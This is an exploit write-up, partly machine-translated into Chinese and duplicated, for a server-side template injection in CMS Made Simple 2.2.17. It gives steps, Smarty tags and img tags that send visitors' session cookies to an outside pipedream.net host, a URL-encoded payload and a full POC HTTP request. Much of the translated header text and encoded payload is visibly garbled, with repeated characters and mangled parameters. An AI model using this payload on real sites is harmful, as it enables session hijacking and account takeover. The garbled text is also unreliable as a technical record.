#Exploit title: cmsmadessimple v2.2.17-通过服务器端模板注入(SSTI)劫持会话
#application: cmsmadesimple
#版本: v2.2.17
#BUGS: SSTI
#Technology: PHP
#DENDOR URL: https://www.cmsmadesimple.org/
#software link: https://www.cmsmadesimple.org/downloads/cmsms
#date of stud: 13-07-2023
#作者:MirabbasAğalarov
#Tested On: Linux
2。技术细节POC
====================================================
步骤:
1。登录到测试用户帐户
2。去找内容经理
3。添加新内容
4。设置为
'''
{$ smarty.version}
{{7*7}}
{$ smarty.now}
{$ smarty.template}
img src=you-server/{$ smarty.cookies.cmssessid852a6e69ca02}
img src=you-server/{$ smarty.cookies.34A3083B62A2255EFA0BC6B5B43333335D226264C2C1}
img src=you_server/{$ smarty.cookies .__ c}
'''
到conten_en部分。
5.如果任何用户访问页面,黑客劫持了所有cookie
PAYLOAD: %3CP%3E%7b%24Smarty.version%7D+%7b%7B7*7%7D%7D+%7b%24Smarty.now%7D+%7B%24SMARTY.TEMPLATE%7d 3A%2F%2FEN3UW3QY2E0ZS.X.PIPEDREAM.NET%2F%7B%24SMARTY.COOKIES.CMSSESSID852A6E69CA02%7D%22+%2F%2F%2F%3E+%3E+%3CIMG+%3CIMG+SRC%3D%22HT tps%3A%2F%2FEN3UW3QY2E0ZS.x.x.pipedream.net%2F%7B%24Smarty.cookies.34A3083B62A222A225EFA0BC6B5B5B433333333333333335D222626264C2C1%%7D%7D%22+%2+%2+%2 F%3E+%3CIMG+SRC%3D%22HTTPS%3A%2F%2FEN3UW3QY2E0ZS.X.X.PIPEDREAM.NET%2F%7B%24Smarty.__ C%7D%7D%22+%2F%2F%3E 3C%3C%2FP%2fp%3E
POC请求
post/admin/moduleinterface.php?mact=cmScontentManager,m1_, admin_editcontent,0; __c=1c2c31a1c1bff4819cd; m1_content_id=81showtemplate=false=false=false=false=false http/1.1
HOST: LOCALHOST
内容长度: 988
SEC-CH-UA:
ACCEPT:应用程序/JSON,text/javaScript, /; Q=0.01
content-type:应用程序/x-www-form-urlenCoded; charset=UTF-8
X-重新要求- WITH: XMLHTTPREQUEST
sec-ch-ua-mobile:0
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/114.0.5735.134 Safari/537.36
sec-ch-ua-platform:''
Origin: http://localhost
sec-fetch-site:相同原产
sec-fetch mode: cors
sec-fetch-Dest:空
Referer: http://localhost/
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: cmsSessID852A6E69CA02=BQ83G023OTKN4S745ACDNVBNU4; 34A3083B62A2225EFA0BC6B5B43335D2226264C2C1=1E91865AC5C59E34F8DC1DDB6FD 168A61246751D%3A%3AEYJ1AWQIOJESINVZZXJUYW1LIJOIYWRTAW4ILCJLZMZFDWLKI joylcjlzmzfdxnlcm5hbwuioij0zxn0iiiwiagfzaci6iiqyesqxmcrdqlwveiynepswmhjhkq29lcwplzxxxxglzxgyplzgypldplzrdlgldldldrdrdrdrdrdrdrdrdrdrdrdrdrdrdrdrdrdrdrdrdrdrdniduo2c3vxmud1vndndndndndndndncrrd; __C=1C2C31A1C1BFF4819CD
连接:关闭
MACT=CMSCONTENTMANAGER%2CM1_%2CADMIN_EDITCONTENT%2C0__C=1C2C31A1BFF4819CDM1_CONTENT_ID=81M1_ACTIVE_TAB=M1_CONTENT_TY pe=contentTitle=testContent_en=%3CP%3E%7b%24Smarty.version%7D+%7b%7B7*7%7D%7D+%7B%24SMARTY.NOW%7D+%7D+%7B%24SMARTY. -emplate. -emplate %7D+%3CIMG+SRC%3D%22HTTPS%3A%2F%2FEN3UW3QY2E0ZS.X.X.PIPEDREAM.NET%2F%7B%24SMARTY.COOKIES.CMARTY.CMSSSESSID8522A6E6E6E69CA02%7D%7D%22+%22+%2F%2F% 3E+%3CIMG+SRC%3D%22Https%3A%2F%2FEN3UW3QY2E0ZS.X.X.PIPEDREAM.NET%2F%7B%24SMARTY.COOKIES.COOKIES.34A3083B622A22A22A22A22A22A22A22A22A25EFAA25EFAESMARTY 264C2C1%7D%22+%2F%3E+%3CIMG+SRC%3D%22Https%3A%2F%2FEN3UW3QY2E0ZS.X.PIPEDREAM.PIPEDREAM.NET%2F%2F%7B%7B%24SMARTY.COOKIES.__ COBIES.__ C%7D%22+%22+%2F%2F%2F%2F%2F%2F%2F%2F% 3E%3C%2FP%3emenutext=testParent_id=-1ShowinMenu=0showinmenu=1titLeatTribute=accessKey=tabindex=tabindex=target=---元数据=pegaged ata=design_id=2template_id=10Alias=testActive=0Active=1Secure=0cachable=0cachable=0cachable=1image=1image=thumbnail=extrabnail=extrabnail=extra1=extra2=extra 3=wandChildren=0wantsChildren=1 Searchable=0searchable=1disable_wyswyg=0 ownererid=1additional_editors=m1_ajax=1m1_apply=1
POC VIDEO:
#application: cmsmadesimple
#版本: v2.2.17
#BUGS: SSTI
#Technology: PHP
#DENDOR URL: https://www.cmsmadesimple.org/
#software link: https://www.cmsmadesimple.org/downloads/cmsms
#date of stud: 13-07-2023
#作者:MirabbasAğalarov
#Tested On: Linux
2。技术细节POC
====================================================
步骤:
1。登录到测试用户帐户
2。去找内容经理
3。添加新内容
4。设置为
'''
{$ smarty.version}
{{7*7}}
{$ smarty.now}
{$ smarty.template}
img src=you-server/{$ smarty.cookies.cmssessid852a6e69ca02}
img src=you-server/{$ smarty.cookies.34A3083B62A2255EFA0BC6B5B43333335D226264C2C1}
img src=you_server/{$ smarty.cookies .__ c}
'''
到conten_en部分。
5.如果任何用户访问页面,黑客劫持了所有cookie
PAYLOAD: %3CP%3E%7b%24Smarty.version%7D+%7b%7B7*7%7D%7D+%7b%24Smarty.now%7D+%7B%24SMARTY.TEMPLATE%7d 3A%2F%2FEN3UW3QY2E0ZS.X.PIPEDREAM.NET%2F%7B%24SMARTY.COOKIES.CMSSESSID852A6E69CA02%7D%22+%2F%2F%2F%3E+%3E+%3CIMG+%3CIMG+SRC%3D%22HT tps%3A%2F%2FEN3UW3QY2E0ZS.x.x.pipedream.net%2F%7B%24Smarty.cookies.34A3083B62A222A225EFA0BC6B5B5B433333333333333335D222626264C2C1%%7D%7D%22+%2+%2+%2 F%3E+%3CIMG+SRC%3D%22HTTPS%3A%2F%2FEN3UW3QY2E0ZS.X.X.PIPEDREAM.NET%2F%7B%24Smarty.__ C%7D%7D%22+%2F%2F%3E 3C%3C%2FP%2fp%3E
POC请求
post/admin/moduleinterface.php?mact=cmScontentManager,m1_, admin_editcontent,0; __c=1c2c31a1c1bff4819cd; m1_content_id=81showtemplate=false=false=false=false=false http/1.1
HOST: LOCALHOST
内容长度: 988
SEC-CH-UA:
ACCEPT:应用程序/JSON,text/javaScript, /; Q=0.01
content-type:应用程序/x-www-form-urlenCoded; charset=UTF-8
X-重新要求- WITH: XMLHTTPREQUEST
sec-ch-ua-mobile:0
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/114.0.5735.134 Safari/537.36
sec-ch-ua-platform:''
Origin: http://localhost
sec-fetch-site:相同原产
sec-fetch mode: cors
sec-fetch-Dest:空
Referer: http://localhost/
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: cmsSessID852A6E69CA02=BQ83G023OTKN4S745ACDNVBNU4; 34A3083B62A2225EFA0BC6B5B43335D2226264C2C1=1E91865AC5C59E34F8DC1DDB6FD 168A61246751D%3A%3AEYJ1AWQIOJESINVZZXJUYW1LIJOIYWRTAW4ILCJLZMZFDWLKI joylcjlzmzfdxnlcm5hbwuioij0zxn0iiiwiagfzaci6iiqyesqxmcrdqlwveiynepswmhjhkq29lcwplzxxxxglzxgyplzgypldplzrdlgldldldrdrdrdrdrdrdrdrdrdrdrdrdrdrdrdrdrdrdrdrdrdrdniduo2c3vxmud1vndndndndndndndncrrd; __C=1C2C31A1C1BFF4819CD
连接:关闭
MACT=CMSCONTENTMANAGER%2CM1_%2CADMIN_EDITCONTENT%2C0__C=1C2C31A1BFF4819CDM1_CONTENT_ID=81M1_ACTIVE_TAB=M1_CONTENT_TY pe=contentTitle=testContent_en=%3CP%3E%7b%24Smarty.version%7D+%7b%7B7*7%7D%7D+%7B%24SMARTY.NOW%7D+%7D+%7B%24SMARTY. -emplate. -emplate %7D+%3CIMG+SRC%3D%22HTTPS%3A%2F%2FEN3UW3QY2E0ZS.X.X.PIPEDREAM.NET%2F%7B%24SMARTY.COOKIES.CMARTY.CMSSSESSID8522A6E6E6E69CA02%7D%7D%22+%22+%2F%2F% 3E+%3CIMG+SRC%3D%22Https%3A%2F%2FEN3UW3QY2E0ZS.X.X.PIPEDREAM.NET%2F%7B%24SMARTY.COOKIES.COOKIES.34A3083B622A22A22A22A22A22A22A22A22A25EFAA25EFAESMARTY 264C2C1%7D%22+%2F%3E+%3CIMG+SRC%3D%22Https%3A%2F%2FEN3UW3QY2E0ZS.X.PIPEDREAM.PIPEDREAM.NET%2F%2F%7B%7B%24SMARTY.COOKIES.__ COBIES.__ C%7D%22+%22+%2F%2F%2F%2F%2F%2F%2F%2F% 3E%3C%2FP%3emenutext=testParent_id=-1ShowinMenu=0showinmenu=1titLeatTribute=accessKey=tabindex=tabindex=target=---元数据=pegaged ata=design_id=2template_id=10Alias=testActive=0Active=1Secure=0cachable=0cachable=0cachable=1image=1image=thumbnail=extrabnail=extrabnail=extra1=extra2=extra 3=wandChildren=0wantsChildren=1 Searchable=0searchable=1disable_wyswyg=0 ownererid=1additional_editors=m1_ajax=1m1_apply=1
POC VIDEO: